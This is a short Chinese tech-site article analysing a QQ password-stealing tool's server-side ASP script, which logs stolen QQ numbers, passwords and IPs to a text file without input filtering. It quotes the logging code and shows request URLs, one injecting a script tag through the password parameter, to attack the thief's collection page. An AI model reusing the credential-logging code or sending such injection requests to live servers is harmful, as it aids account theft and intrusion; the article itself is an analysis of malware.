找出安全漏洞 QQ盜號(hào)軟件后門分析與反擊
您當(dāng)前位置:首頁(yè) > 紅訊頻道 > 網(wǎng)絡(luò)技術(shù)
紅軟基地 推薦
2012-01-17
寫入q7.txt文件
格式為 QQ號(hào)碼----QQ密碼----會(huì)員:----IP:
繼續(xù)看下面的代碼
set f=Server.CreateObject("scripting.filesystemobject") (沒有q7.txt這個(gè)文件就自動(dòng)新建)
set ff=f.opentextfile(server.mappath(".")&"/"&strLogFile,8,true,0)
ff.writeline(StrLogText) (打開q7.txt并寫入數(shù)據(jù))
最后response.write "發(fā)送成功!" 滿足條件提示成功.
所有的代碼也就是這些..程序并未做任何過濾..和處理..也就是說..只要滿足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "發(fā)送成功!"的提示.
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123圖11
這就證明了QQNumber=123&QQPassWord=123這兩個(gè)我們是可以自己定義的..如果我們寫入的不是數(shù)字..而且一段腳本代碼呢?會(huì)不會(huì)執(zhí)行呢..讓我們來試下
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=< ... quot;fhod")</script>
圖12
插入代碼成功...我們來看下
http://www.ciker.org/soft/q7.txt的源文件又是什么樣的..
圖13
來源:紅訊頻道